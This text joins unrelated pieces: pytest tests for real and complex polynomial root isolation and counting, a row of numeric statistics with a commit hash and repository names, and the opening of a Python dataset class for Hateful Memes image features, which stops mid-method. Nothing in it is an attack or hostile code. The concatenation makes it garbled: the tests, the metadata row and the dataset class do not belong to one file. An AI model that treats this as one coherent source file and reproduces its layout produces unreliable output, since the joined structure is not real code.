    f, g = x**2*(x - 1)**3*(x**2 - 2)**2, x*(x - 1)**2*(x**2 + 2)
    _x = R.clone(domain=ZZ.field).x
    assert R._isolate_real_roots_pair(f, g) == \
        [((-2, -1), {0: 2}), ((0, 0), {0: 2, 1: 1}),
         ((1, 1), {0: 3, 1: 2}), ((1, 2), {0: 2})]
    assert R._isolate_real_roots_pair(f, g, basis=True) == \
        [((-2, -1), {0: 2}, _x**2 - 2), ((0, 0), {0: 2, 1: 1}, _x),
         ((1, 1), {0: 3, 1: 2}, _x - 1), ((1, 2), {0: 2}, _x**2 - 2)]

    # The zero polynomial contributes the other polynomial's roots, and the
    # result is symmetric in the argument order.
    f, g = x, R.zero
    assert R._isolate_real_roots_pair(f, g) == \
        R._isolate_real_roots_pair(g, f) == [((0, 0), {0: 1, 1: 1})]
    f *= x**2
    assert R._isolate_real_roots_pair(f, g) == \
        R._isolate_real_roots_pair(g, f) == [((0, 0), {0: 3, 1: 3})]

    # Unsupported domain raises DomainError.
    R, x = ring('x', EX)

    pytest.raises(DomainError, lambda: R._isolate_real_roots_pair(x, x + 3))

    # Nearly-coincident roots must still be separated.
    R, x = ring('x', ZZ)

    f, g = x**5 - 200, x**5 - 201
    assert R._isolate_real_roots_pair(f, g) == \
        [((QQ(75, 26), QQ(101, 35)), {0: 1}), ((QQ(309, 107), QQ(26, 9)), {1: 1})]

    R, x = ring('x', QQ)

    f, g = -x**5/200 + 1, -x**5/201 + 1
    assert R._isolate_real_roots_pair(f, g) == \
        [((QQ(75, 26), QQ(101, 35)), {0: 1}), ((QQ(309, 107), QQ(26, 9)), {1: 1})]
def test__count_real_roots():
    """Count real roots, optionally within an ``inf``/``sup`` interval.

    Constants have no roots; bounds are inclusive (the root of ``x - 1``
    at 1 is counted when a bound equals 1).  Over QQ(I), only the real
    roots are counted.
    """
    R, x = ring('x', ZZ)

    assert R._count_real_roots(R(0)) == 0
    assert R._count_real_roots(R(7)) == 0

    f = x - 1
    assert R._count_real_roots(f) == 1
    assert R._count_real_roots(f, inf=1) == 1
    assert R._count_real_roots(f, sup=0) == 0
    assert R._count_real_roots(f, sup=1) == 1
    assert R._count_real_roots(f, inf=0, sup=1) == 1
    assert R._count_real_roots(f, inf=0, sup=2) == 1
    assert R._count_real_roots(f, inf=1, sup=2) == 1

    f = x**2 - 2
    assert R._count_real_roots(f) == 2
    assert R._count_real_roots(f, sup=0) == 1
    assert R._count_real_roots(f, inf=-1, sup=1) == 0

    # Algebraic-field coefficients: complex roots are ignored.
    R, x = ring('x', QQ.algebraic_field(I))

    f = x**3 + I*x + 2
    assert R._count_real_roots(f) == 0
    f *= (x - 1)*(x + 1)
    assert R._count_real_roots(f) == 2
# Shared rectangle corners for the test__count_complex_roots_*() tests below:
# (a, b) spans the square [-1, 1] x [-1, 1] in the complex plane, while
# (c, d) is its closed upper-right quadrant [0, 1] x [0, 1].
a, b = (-1, -1), (1, 1)
c, d = (+0, +0), (1, 1)
def test__count_complex_roots_1():
    """Count complex roots of linear polynomials inside a rectangle."""
    R, x = ring('x', ZZ)

    # Root at 1 lies in both rectangles; negation does not change roots.
    f = x - 1
    assert R._count_complex_roots(f, a, b) == 1
    assert R._count_complex_roots(f, c, d) == 1
    f = -f
    assert R._count_complex_roots(f, a, b) == 1
    assert R._count_complex_roots(f, c, d) == 1

    # Root at -1 is outside the upper-right quadrant (c, d).
    f = x + 1
    assert R._count_complex_roots(f, a, b) == 1
    assert R._count_complex_roots(f, c, d) == 0

    R, x = ring('x', QQ)

    f = x - QQ(1, 2)
    assert R._count_complex_roots(f, c, d) == 1

    # Unsupported domain raises DomainError.
    R, x = ring('x', EX)

    pytest.raises(DomainError, lambda: R._count_complex_roots(x))
def test__count_complex_roots_2():
    """Count complex roots of quadratics with real roots at 0 and ±1."""
    R, x = ring('x', ZZ)

    # Roots 0 and 1: both in each rectangle (boundaries are included).
    f = x*(x - 1)
    assert R._count_complex_roots(f, a, b) == 2
    assert R._count_complex_roots(f, c, d) == 2
    f = -f
    assert R._count_complex_roots(f, a, b) == 2
    assert R._count_complex_roots(f, c, d) == 2

    # Roots 0 and -1: only 0 lies in the upper-right quadrant.
    f = x*(x + 1)
    assert R._count_complex_roots(f, a, b) == 2
    assert R._count_complex_roots(f, c, d) == 1
    f = -f
    assert R._count_complex_roots(f, a, b) == 2
    assert R._count_complex_roots(f, c, d) == 1
def test__count_complex_roots_3():
    """Count complex roots of cubics with real roots at -1, 0, 1."""
    R, x = ring('x', ZZ)

    f = (x - 1)*(x + 1)
    assert R._count_complex_roots(f, a, b) == 2
    assert R._count_complex_roots(f, c, d) == 1

    f = x*(x - 1)*(x + 1)
    assert R._count_complex_roots(f, a, b) == 3
    assert R._count_complex_roots(f, c, d) == 2
    f = -f
    assert R._count_complex_roots(f, a, b) == 3
    assert R._count_complex_roots(f, c, d) == 2
def test__count_complex_roots_4():
    """Count roots of products of ``x**2 + 1`` (roots ±i) with real factors."""
    R, x = ring('x', ZZ)

    # ±i both lie in [-1, 1] x [-1, 1]; only +i is in the quadrant.
    f = x**2 + 1
    assert R._count_complex_roots(f, a, b) == 2
    assert R._count_complex_roots(f, c, d) == 1

    f = x*(x**2 + 1)
    assert R._count_complex_roots(f, a, b) == 3
    assert R._count_complex_roots(f, c, d) == 2
    f = -f
    assert R._count_complex_roots(f, a, b) == 3
    assert R._count_complex_roots(f, c, d) == 2

    f = (x**2 + 1)*(x - 1)
    assert R._count_complex_roots(f, a, b) == 3
    assert R._count_complex_roots(f, c, d) == 2
    f *= x
    assert R._count_complex_roots(f, a, b) == 4
    assert R._count_complex_roots(f, c, d) == 3
    f = -f
    assert R._count_complex_roots(f, a, b) == 4
    assert R._count_complex_roots(f, c, d) == 3

    f = (x**2 + 1)*(x - 1)*(x + 1)
    assert R._count_complex_roots(f, a, b) == 4
    assert R._count_complex_roots(f, c, d) == 2
    f *= x
    assert R._count_complex_roots(f, a, b) == 5
    assert R._count_complex_roots(f, c, d) == 3
    f = -f
    assert R._count_complex_roots(f, a, b) == 5
    assert R._count_complex_roots(f, c, d) == 3
def test__count_complex_roots_5():
    """Count roots of ``(x + 1)**2 + 1`` (roots -1 ± i) with real factors."""
    R, x = ring('x', ZZ)

    # -1 ± i are on the left edge of [-1, 1] x [-1, 1], outside the quadrant.
    f = (x + 1)**2 + 1
    assert R._count_complex_roots(f, a, b) == 2
    assert R._count_complex_roots(f, c, d) == 0

    f = ((x + 1)**2 + 1)*(x - 1)
    assert R._count_complex_roots(f, a, b) == 3
    assert R._count_complex_roots(f, c, d) == 1
    f *= x
    assert R._count_complex_roots(f, a, b) == 4
    assert R._count_complex_roots(f, c, d) == 2

    f = ((x + 1)**2 + 1)*(x + 1)
    assert R._count_complex_roots(f, a, b) == 3
    assert R._count_complex_roots(f, c, d) == 0
    f *= x
    assert R._count_complex_roots(f, a, b) == 4
    assert R._count_complex_roots(f, c, d) == 1

    f = ((x + 1)**2 + 1)*(x - 1)*(x + 1)
    assert R._count_complex_roots(f, a, b) == 4
    assert R._count_complex_roots(f, c, d) == 1
    f *= x
    assert R._count_complex_roots(f, a, b) == 5
    assert R._count_complex_roots(f, c, d) == 2
def test__count_complex_roots_6():
    """Count roots of ``(x - 1)**2 + 1`` (roots 1 ± i) with real factors."""
    R, x = ring('x', ZZ)

    # 1 ± i sit on the right edge; only 1 + i is in the closed quadrant.
    f = (x - 1)**2 + 1
    assert R._count_complex_roots(f, a, b) == 2
    assert R._count_complex_roots(f, c, d) == 1

    f *= x - 1
    assert R._count_complex_roots(f, a, b) == 3
    assert R._count_complex_roots(f, c, d) == 2
    f *= x
    assert R._count_complex_roots(f, a, b) == 4
    assert R._count_complex_roots(f, c, d) == 3

    f = ((x - 1)**2 + 1)*(x + 1)
    assert R._count_complex_roots(f, a, b) == 3
    assert R._count_complex_roots(f, c, d) == 1
    f *= x
    assert R._count_complex_roots(f, a, b) == 4
    assert R._count_complex_roots(f, c, d) == 2

    f = ((x - 1)**2 + 1)*(x - 1)*(x + 1)
    assert R._count_complex_roots(f, a, b) == 4
    assert R._count_complex_roots(f, c, d) == 2
    f *= x
    assert R._count_complex_roots(f, a, b) == 5
    assert R._count_complex_roots(f, c, d) == 3
def test__count_complex_roots_7():
    """Count roots of products mixing 1 ± i, -1 ± i, ±i and real factors."""
    R, x = ring('x', ZZ)

    f = ((x - 1)**2 + 1)*((x + 1)**2 + 1)
    assert R._count_complex_roots(f, a, b) == 4
    assert R._count_complex_roots(f, c, d) == 1

    # Extra real roots outside the rectangles change nothing.
    f *= (x - 2)
    assert R._count_complex_roots(f, a, b) == 4
    assert R._count_complex_roots(f, c, d) == 1

    f = ((x - 1)**2 + 1)*((x + 1)**2 + 1)*(x**2 - 2)
    assert R._count_complex_roots(f, a, b) == 4
    assert R._count_complex_roots(f, c, d) == 1

    f = ((x - 1)**2 + 1)*((x + 1)**2 + 1)*(x - 1)
    assert R._count_complex_roots(f, a, b) == 5
    assert R._count_complex_roots(f, c, d) == 2
    f *= x
    assert R._count_complex_roots(f, a, b) == 6
    assert R._count_complex_roots(f, c, d) == 3

    f = ((x - 1)**2 + 1)*((x + 1)**2 + 1)*(x + 1)
    assert R._count_complex_roots(f, a, b) == 5
    assert R._count_complex_roots(f, c, d) == 1
    f *= x
    assert R._count_complex_roots(f, a, b) == 6
    assert R._count_complex_roots(f, c, d) == 2

    f = ((x - 1)**2 + 1)*((x + 1)**2 + 1)*(x - 1)*(x + 1)
    assert R._count_complex_roots(f, a, b) == 6
    assert R._count_complex_roots(f, c, d) == 2
    f *= x
    assert R._count_complex_roots(f, a, b) == 7
    assert R._count_complex_roots(f, c, d) == 3

    f = ((x - 1)**2 + 1)*((x + 1)**2 + 1)*(x - 1)*(x + 1)*(x**2 + 1)
    assert R._count_complex_roots(f, a, b) == 8
    assert R._count_complex_roots(f, c, d) == 3
def test__count_complex_roots_8():
    """Count roots of a degree-9 product with every rectangle corner covered."""
    R, x = ring('x', ZZ)

    f = ((x - 1)**2 + 1)*((x + 1)**2 + 1)*(x - 1)*(x + 1)*(x**2 + 1)*x
    assert R._count_complex_roots(f, a, b) == 9
    assert R._count_complex_roots(f, c, d) == 4

    # ±sqrt(2) fall outside both rectangles, so the counts are unchanged.
    f *= (x**2 - 2)
    assert R._count_complex_roots(f, a, b) == 9
    assert R._count_complex_roots(f, c, d) == 4
def test__count_complex_roots_9():
    """Count complex roots over algebraic extension fields."""
    R, x = ring('x', QQ.algebraic_field(sqrt(2)))

    f = -x**3 + sqrt(2)*x - 1
    assert R._count_complex_roots(f, a, b) == 2
    assert R._count_complex_roots(f, c, d) == 1

    # Nested extension QQ(sqrt(2))(I) with a genuinely complex coefficient.
    R, x = ring('x', QQ.algebraic_field(sqrt(2)).algebraic_field(I))

    f = -x**3 + I*x**2 + sqrt(2)*x - 1
    assert R._count_complex_roots(f, a, b) == 2
    assert R._count_complex_roots(f, c, d) == 1
def test__count_complex_roots_implicit():
    """Count complex roots with implicit (omitted) rectangle corners."""
    R, x = ring('x', ZZ)

    # Roots: ±i, ±1 and 0.
    f = (x**2 + 1)*(x - 1)*(x + 1)*x

    # With no corners given, all roots are counted.
    assert R._count_complex_roots(f) == 5

    # A single corner restricts to a half-plane; scalar bounds are treated
    # as real values.
    assert R._count_complex_roots(f, sup=(0, 0)) == 3
    assert R._count_complex_roots(f, inf=(0, 0)) == 3
    assert R._count_complex_roots(f, inf=QQ(-2), sup=QQ(-1)) == 1
def test__count_complex_roots_exclude():
    """Count complex roots with rectangle edges/corners excluded.

    ``exclude`` names edges ('N', 'S', 'E', 'W') and corners ('NE', 'NW',
    'SE', 'SW') whose boundary roots should not be counted; ``exclude=True``
    drops all of them.
    """
    R, x = ring('x', ZZ)

    # Roots: ±i, ±1 and 0.
    f = (x**2 + 1)*(x - 1)*(x + 1)*x

    # Local rectangle [-1, 1] x [0, 1] (shadows the module-level a, b).
    a, b = (-1, 0), (1, 1)

    assert R._count_complex_roots(f, a, b) == 4

    assert R._count_complex_roots(f, a, b, exclude=['S']) == 3
    assert R._count_complex_roots(f, a, b, exclude=['N']) == 3

    assert R._count_complex_roots(f, a, b, exclude=['S', 'N']) == 2

    # No roots lie on the east/west edges of this rectangle.
    assert R._count_complex_roots(f, a, b, exclude=['E']) == 4
    assert R._count_complex_roots(f, a, b, exclude=['W']) == 4

    assert R._count_complex_roots(f, a, b, exclude=['E', 'W']) == 4

    assert R._count_complex_roots(f, a, b, exclude=['N', 'S', 'E', 'W']) == 2

    assert R._count_complex_roots(f, a, b, exclude=['SW']) == 3
    assert R._count_complex_roots(f, a, b, exclude=['SE']) == 3

    assert R._count_complex_roots(f, a, b, exclude=['SW', 'SE']) == 2
    assert R._count_complex_roots(f, a, b, exclude=['SW', 'SE', 'S']) == 1
    assert R._count_complex_roots(f, a, b, exclude=['SW', 'SE', 'S', 'N']) == 0

    a, b = (0, 0), (1, 1)

    assert R._count_complex_roots(f, a, b, exclude=True) == 1

    # Over QQ(I): each isolating rectangle must contain exactly one root.
    R, x = ring('x', QQ.algebraic_field(I))

    f = x**4 + I*x**3 - x + 1

    assert R._count_complex_roots(f, inf=(0, 0), sup=(1, 1)) == 1

    r = R._isolate_complex_roots_sqf(f)
    assert r == [((QQ(-201, 100), QQ(-201, 100)), (0, 0)),
                 ((QQ(-201, 100), 0), (0, QQ(201, 100))),
                 ((0, QQ(-201, 100)), (QQ(201, 100), 0)),
                 ((0, 0), (QQ(201, 100), QQ(201, 100)))]
    assert all(R._count_complex_roots(f, inf=i, sup=s) == 1
               for i, s in r)
def test__isolate_complex_roots_sqf():
    """Isolate complex roots of square-free polynomials.

    Results are lists of rectangles ``((re_inf, im_inf), (re_sup, im_sup))``,
    one per root, optionally restricted by ``inf``/``sup`` corners, refined
    to ``eps``, or returned as blackbox ``ComplexInterval`` objects.
    """
    R, x = ring('x', ZZ)

    # Roots 1 ± i*sqrt(2): one rectangle per half-plane.
    f = x**2 - 2*x + 3

    assert R._isolate_complex_roots_sqf(f) == \
        [((0, -6), (6, 0)), ((0, 0), (6, 6))]
    assert [r.as_tuple() for r in R._isolate_complex_roots_sqf(f, blackbox=True)] == \
        [((0, -6), (6, 0)), ((0, 0), (6, 6))]

    # Scalar bounds are real parts; tuple bounds give full corners.
    assert R._isolate_complex_roots_sqf(f, inf=1, sup=3) == [((1, -3), (3, 0)), ((1, 0), (3, 3))]
    assert R._isolate_complex_roots_sqf(f, inf=(1, 0), sup=3) == [((1, 0), (3, 3))]
    assert R._isolate_complex_roots_sqf(f, inf=(1, QQ(-1, 2)), sup=3) == [((1, 0), (3, 3))]
    assert R._isolate_complex_roots_sqf(f, inf=(1, -3), sup=(3, -1)) == [((1, -3), (3, -1))]
    assert R._isolate_complex_roots_sqf(f, inf=0, sup=QQ(1, 6)) == []

    assert R._isolate_complex_roots_sqf(R.zero) == []

    # Degenerate (empty) search region is rejected.
    pytest.raises(ValueError, lambda: R._isolate_complex_roots_sqf(f, inf=1, sup=1))

    assert R._isolate_complex_roots_sqf(f, eps=QQ(1, 10)) == \
        [((QQ(15, 16), -QQ(3, 2)), (QQ(33, 32), -QQ(45, 32))),
         ((QQ(15, 16), QQ(45, 32)), (QQ(33, 32), QQ(3, 2)))]
    assert R._isolate_complex_roots_sqf(f, eps=QQ(1, 100)) == \
        [((QQ(255, 256), -QQ(363, 256)), (QQ(513, 512), -QQ(723, 512))),
         ((QQ(255, 256), QQ(723, 512)), (QQ(513, 512), QQ(363, 256)))]

    f = 7*x**4 - 19*x**3 + 20*x**2 + 17*x + 20

    assert R._isolate_complex_roots_sqf(f) == \
        [((-QQ(40, 7), -QQ(40, 7)), (0, 0)), ((-QQ(40, 7), 0), (0, QQ(40, 7))),
         ((0, -QQ(40, 7)), (QQ(40, 7), 0)), ((0, 0), (QQ(40, 7), QQ(40, 7)))]
    assert R._isolate_complex_roots_sqf(f, eps=QQ(1, 10)) == \
        [((QQ(-25, 56), QQ(-5, 8)), (QQ(-5, 14), QQ(-15, 28))),
         ((QQ(-25, 56), QQ(15, 28)), (QQ(-5, 14), QQ(5, 8))),
         ((QQ(95, 56), QQ(-85, 56)), (QQ(25, 14), QQ(-10, 7))),
         ((QQ(95, 56), QQ(10, 7)), (QQ(25, 14), QQ(85, 56)))]

    R, x = ring('x', QQ)

    f = x**2/2 - 3*x/7 + 1
    assert R._isolate_complex_roots_sqf(f) == [((0, -4), (4, 0)), ((0, 0), (4, 4))]

    # Unsupported domain raises DomainError (with or without bounds).
    R, x = ring('x', EX)

    pytest.raises(DomainError,
                  lambda: R._isolate_complex_roots_sqf(x, inf=(-1, 0),
                                                       sup=(1, 1)))

    R, x = ring('x', QQ.algebraic_field(I))

    f = x**4 + I*x**3 - x + 1

    assert R._isolate_complex_roots_sqf(f, inf=(0, 0),
                                        sup=(1, 1)) == [((0, 0), (1, QQ(1, 2)))]
    assert R._isolate_complex_roots_sqf(f, inf=(0, 0), sup=(1, 1),
                                        eps=QQ(1, 100)) == [((QQ(79, 128), QQ(19, 64)),
                                                             (QQ(5, 8), QQ(39, 128)))]
    assert R._isolate_complex_roots_sqf(f, inf=(0, -1),
                                        sup=(1, 1)) == [((0, -1), (1, QQ(-1, 2))),
                                                        ((0, 0), (1, QQ(1, 2)))]
    assert R._isolate_complex_roots_sqf(f, inf=(0, -1), sup=(1, 1),
                                        eps=QQ(1, 100)) == [((QQ(79, 128), QQ(19, 64)),
                                                             (QQ(5, 8), QQ(39, 128))),
                                                            ((QQ(45, 64), QQ(-91, 128)),
                                                             (QQ(91, 128), QQ(-45, 64)))]

    f *= (x - 1)

    assert R._isolate_complex_roots_sqf(f) == [((QQ(-401, 100), QQ(-401, 100)), (0, 0)),
                                               ((QQ(-401, 100), 0), (0, QQ(401, 100))),
                                               ((0, QQ(-401, 100)), (QQ(401, 100), 0)),
                                               ((0, 0), (QQ(401, 100), QQ(401, 100)))]

    f = x**7 + I*x**4 - (2 + I)*x**3 - 3*x + 5

    assert R._isolate_complex_roots_sqf(f) == [((QQ(-1001, 100), 0), (0, QQ(1001, 100))),
                                               ((QQ(-1001, 400), QQ(-1001, 800)), (QQ(-1001, 800), 0)),
                                               ((QQ(-1001, 800), QQ(-1001, 800)), (0, 0)),
                                               ((0, QQ(-1001, 400)), (QQ(1001, 400), QQ(-1001, 800))),
                                               ((0, QQ(-1001, 800)), (QQ(1001, 400), 0)),
                                               ((0, 0), (QQ(1001, 400), QQ(1001, 800))),
                                               ((0, QQ(1001, 800)), (QQ(1001, 400), QQ(1001, 400)))]

    R, x = ring('x', QQ.algebraic_field(sqrt(2)))

    f = -x**3 + sqrt(2)*x - 1

    assert R._isolate_complex_roots_sqf(f) == [((0, QQ(-283, 100)), (QQ(283, 100), 0)),
                                               ((0, 0), (QQ(283, 100), QQ(283, 100)))]

    R, x = ring('x', QQ.algebraic_field(sqrt(2)).algebraic_field(I))

    f = -x**3 + I*x**2 + sqrt(2)*x - 1

    assert R._isolate_complex_roots_sqf(f) == [((QQ(-283, 100), 0), (0, QQ(283, 100))),
                                               ((0, QQ(-283, 100)), (QQ(283, 100), 0)),
                                               ((0, 0), (QQ(283, 100), QQ(283, 100)))]

    R, x = ring('x', EX)

    pytest.raises(DomainError, lambda: R._isolate_complex_roots_sqf(x))
@pytest.mark.timeout(300)
@pytest.mark.slow
def test__isolate_complex_roots_sqf_2():
    """Isolate all 38 complex roots of a dense degree-40 polynomial.

    Stress test: marked slow with a 300 s timeout; checks the full list of
    isolating rectangles against precomputed values.
    """
    R, x = ring('x', ZZ)

    f = x**40 - 15*x**17 - 21*x**3 + 11
    res = R._isolate_complex_roots_sqf(f)
    ans = [((QQ(-21, 16), QQ(-21, 128)), (QQ(-63, 64), 0)),
           ((QQ(-21, 16), 0), (QQ(-63, 64), QQ(21, 128))),
           ((QQ(-21, 16), QQ(-21, 64)), (QQ(-63, 64), QQ(-21, 128))),
           ((QQ(-21, 16), QQ(21, 128)), (QQ(-63, 64), QQ(21, 64))),
           ((QQ(-21, 16), QQ(-21, 32)), (QQ(-63, 64), QQ(-21, 64))),
           ((QQ(-21, 16), QQ(21, 64)), (QQ(-63, 64), QQ(21, 32))),
           ((QQ(-63, 64), QQ(-21, 32)), (QQ(-21, 32), QQ(-21, 64))),
           ((QQ(-63, 64), QQ(21, 64)), (QQ(-21, 32), QQ(21, 32))),
           ((QQ(-63, 64), QQ(-105, 128)), (QQ(-21, 32), QQ(-21, 32))),
           ((QQ(-63, 64), QQ(21, 32)), (QQ(-21, 32), QQ(105, 128))),
           ((QQ(-63, 64), QQ(-63, 64)), (QQ(-21, 32), QQ(-105, 128))),
           ((QQ(-63, 64), QQ(105, 128)), (QQ(-21, 32), QQ(63, 64))),
           ((QQ(-21, 32), QQ(-105, 128)), (QQ(-21, 64), QQ(-21, 32))),
           ((QQ(-21, 32), QQ(21, 32)), (QQ(-21, 64), QQ(105, 128))),
           ((QQ(-21, 32), QQ(-63, 64)), (QQ(-21, 64), QQ(-105, 128))),
           ((QQ(-21, 32), QQ(105, 128)), (QQ(-21, 64), QQ(63, 64))),
           ((QQ(-21, 32), QQ(-21, 16)), (QQ(-21, 64), QQ(-63, 64))),
           ((QQ(-21, 32), QQ(63, 64)), (QQ(-21, 64), QQ(21, 16))),
           ((QQ(-21, 64), QQ(-21, 16)), (QQ(0, 1), QQ(-63, 64))),
           ((QQ(-21, 64), QQ(63, 64)), (QQ(0, 1), QQ(21, 16))),
           ((QQ(0, 1), QQ(-147, 128)), (QQ(21, 128), QQ(-63, 64))),
           ((QQ(0, 1), QQ(63, 64)), (QQ(21, 128), QQ(147, 128))),
           ((QQ(21, 128), QQ(-147, 128)), (QQ(21, 64), QQ(-63, 64))),
           ((QQ(21, 128), QQ(63, 64)), (QQ(21, 64), QQ(147, 128))),
           ((QQ(21, 64), QQ(-63, 64)), (QQ(63, 128), QQ(-105, 128))),
           ((QQ(21, 64), QQ(105, 128)), (QQ(63, 128), QQ(63, 64))),
           ((QQ(63, 128), QQ(-63, 64)), (QQ(21, 32), QQ(-105, 128))),
           ((QQ(63, 128), QQ(105, 128)), (QQ(21, 32), QQ(63, 64))),
           ((QQ(21, 32), QQ(-21, 64)), (QQ(63, 64), 0)),
           ((QQ(21, 32), 0), (QQ(63, 64), QQ(21, 64))),
           ((QQ(21, 32), QQ(-21, 32)), (QQ(21, 16), QQ(-21, 64))),
           ((QQ(21, 32), QQ(21, 64)), (QQ(21, 16), QQ(21, 32))),
           ((QQ(21, 32), QQ(-105, 128)), (QQ(63, 64), QQ(-21, 32))),
           ((QQ(21, 32), QQ(21, 32)), (QQ(63, 64), QQ(105, 128))),
           ((QQ(21, 32), QQ(-63, 64)), (QQ(63, 64), QQ(-105, 128))),
           ((QQ(21, 32), QQ(105, 128)), (QQ(63, 64), QQ(63, 64))),
           ((QQ(63, 64), QQ(-21, 64)), (QQ(21, 16), 0)),
           ((QQ(63, 64), 0), (QQ(21, 16), QQ(21, 64)))]
    assert res == ans
def test__isolate_all_roots_sqf():
    """Isolate real and complex roots of a square-free polynomial at once.

    Returns a pair ``(real_intervals, complex_rectangles)``; ``eps`` refines
    both parts.
    """
    R, x = ring('x', ZZ)

    f = (4*x**3 - x**2 + 2*x + 5)*x

    assert R._isolate_all_roots_sqf(f) == \
        ([(-1, 0), (0, 0)],
         [((0, -QQ(5, 2)), (QQ(5, 2), 0)), ((0, 0), (QQ(5, 2), QQ(5, 2)))])
    assert R._isolate_all_roots_sqf(f, eps=QQ(1, 10)) == \
        ([(QQ(-7, 8), QQ(-6, 7)), (0, 0)],
         [((QQ(35, 64), -QQ(35, 32)), (QQ(5, 8), -QQ(65, 64))), ((QQ(35, 64), QQ(65, 64)), (QQ(5, 8), QQ(35, 32)))])

    R, x = ring('x', EX)

    # NOTE(review): the extra positional argument `R` here looks spurious
    # (other DomainError checks pass only the polynomial) — the call raises
    # DomainError either way, but confirm against the method's signature.
    pytest.raises(DomainError, lambda: R._isolate_all_roots_sqf(x, R))
def test__isolate_all_roots():
    """Isolate real and complex roots with multiplicities.

    Like ``_isolate_all_roots_sqf`` but each interval/rectangle is paired
    with its multiplicity; non-square-free input is not supported, nor are
    non-numeric coefficient domains.
    """
    R, x = ring('x', ZZ)

    f = (4*x**3 - x**2 + 2*x + 5)*x

    assert R._isolate_all_roots(f) == \
        ([((-1, 0), 1), ((0, 0), 1)],
         [(((0, -QQ(5, 2)), (QQ(5, 2), 0)), 1),
          (((0, 0), (QQ(5, 2), QQ(5, 2))), 1)])
    assert R._isolate_all_roots(f, eps=QQ(1, 10)) == \
        ([((QQ(-7, 8), QQ(-6, 7)), 1), ((0, 0), 1)],
         [(((QQ(35, 64), -QQ(35, 32)), (QQ(5, 8), -QQ(65, 64))), 1),
          (((QQ(35, 64), QQ(65, 64)), (QQ(5, 8), QQ(35, 32))), 1)])

    # Polynomials with repeated roots are rejected.
    f = (x - 1)**2*(x + 1)**3
    pytest.raises(NotImplementedError, lambda: R._isolate_all_roots(f))

    # Polynomial coefficient domain ZZ[y] is rejected.
    D, y = ring('y', ZZ)
    R, x = ring('x', D)

    f = x**2 + y*x - 1
    pytest.raises(DomainError, lambda: R._isolate_all_roots(f))
def test_RealInterval():
    """RealInterval rejects an interval that is not isolating for f."""
    _, x = ring('x', ZZ)

    f = (x - 1)**2

    # (-2, 1) does not isolate a single simple root of (x - 1)**2.
    pytest.raises(ValueError, lambda: RealInterval((-2, 1), f))
def test_ComplexInterval():
    """ComplexInterval disjointness and refinement behaviour."""
    R, x = ring('x', QQ.algebraic_field(I))

    f = x**3 + x + I
    _, r1, r2 = R._isolate_complex_roots_sqf(f, blackbox=True)

    # Initially disjoint as rectangles, but their real projections overlap.
    assert r1.is_disjoint(r2) is True
    assert r1.is_disjoint(r2, check_re_refinement=True) is False

    # After a few refinements the real projections separate too.
    for _ in range(4):
        r1, r2 = r1.refine(), r2.refine()
    assert r1.is_disjoint(r2, check_re_refinement=True) is True

    # vertical=True refines only the real (horizontal) extent: imaginary
    # bounds are unchanged, real bounds strictly shrink.
    (u1, v1), (s1, t1) = r1.as_tuple()
    (u2, v2), (s2, t2) = r1.refine(vertical=True).as_tuple()
    assert v1 == v2 and t1 == t2
    assert u1 <= u2 < s2 < s1
def test_issue_745():
    """Regression test: counting real roots over ZZ[y] raises DomainError."""
    D, y = ring('y', ZZ)
    R, x = ring('x', D)

    pytest.raises(DomainError, lambda: R._count_real_roots(x**7 + y*x + 1))
| 34.594801 | 123 | 0.492022 | 8,194 | 45,250 | 2.535026 | 0.03649 | 0.125024 | 0.111207 | 0.121943 | 0.838725 | 0.813162 | 0.770942 | 0.726314 | 0.670662 | 0.602927 | 0 | 0.143458 | 0.264729 | 45,250 | 1,307 | 124 | 34.62127 | 0.480869 | 0.003359 | 0 | 0.332566 | 0 | 0 | 0.002351 | 0 | 0 | 0 | 0 | 0 | 0.453395 | 1 | 0.035673 | false | 0 | 0.004603 | 0 | 0.040276 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6076671796a6ecedf8afe47d0e0cb9d3110f507c | 10,212 | py | Python | mmf/datasets/builders/hateful_memes/dataset.py | hivestrung/mmf | 6a563010979d7a634045428a368a57ed2185f35a | [
"BSD-3-Clause"
] | null | null | null | mmf/datasets/builders/hateful_memes/dataset.py | hivestrung/mmf | 6a563010979d7a634045428a368a57ed2185f35a | [
"BSD-3-Clause"
] | null | null | null | mmf/datasets/builders/hateful_memes/dataset.py | hivestrung/mmf | 6a563010979d7a634045428a368a57ed2185f35a | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates.
import copy
import os
import numpy as np
import omegaconf
import torch
from mmf.common.sample import Sample
from mmf.datasets.mmf_dataset import MMFDataset
from mmf.utils.general import get_mmf_root
from mmf.utils.visualize import visualize_images
from PIL import Image
from torchvision import transforms
class HatefulMemesFeaturesDataset(MMFDataset):
    """Hateful Memes dataset backed by precomputed image region features.

    Each annotation's image path (e.g. ``img/02345.png``) is mapped to a
    ``02345.npy`` entry in the features database.  Samples carry the
    processed text, the image features and — when labels are present —
    the classification targets.
    """

    def __init__(self, config, *args, dataset_name="hateful_memes", **kwargs):
        super().__init__(dataset_name, config, *args, **kwargs)
        # Bug fix: the message previously said "'use_images' ... image
        # dataset", but this dataset requires features, not raw images.
        assert (
            self._use_features
        ), "config's 'use_features' must be true to use features dataset"
        # Multilabel mode (e.g. fine-grained labels) switches prediction
        # formatting from binary softmax to per-class sigmoid scores.
        self.is_multilabel = self.config.get("is_multilabel", False)

    def preprocess_sample_info(self, sample_info):
        """Add the ``feature_path`` key used by the features database.

        Maps ``img/02345.png`` -> ``02345.npy``.
        """
        image_path = sample_info["img"]
        feature_path = image_path.split("/")[-1].split(".")[0]
        sample_info["feature_path"] = f"{feature_path}.npy"
        return sample_info

    def __getitem__(self, idx):
        """Build a Sample with text, image features and optional targets."""
        sample_info = self.preprocess_sample_info(self.annotation_db[idx])

        current_sample = Sample()

        processed_text = self.text_processor({"text": sample_info["text"]})
        current_sample.text = processed_text["text"]
        if "input_ids" in processed_text:
            current_sample.update(processed_text)

        current_sample.id = torch.tensor(int(sample_info["id"]), dtype=torch.int)

        # Fetch by sample_info (not idx) so the dynamically added
        # feature_path key is honored by the features database.
        features = self.features_db.get(sample_info)
        if hasattr(self, "transformer_bbox_processor"):
            features["image_info_0"] = self.transformer_bbox_processor(
                features["image_info_0"]
            )
        current_sample.update(features)

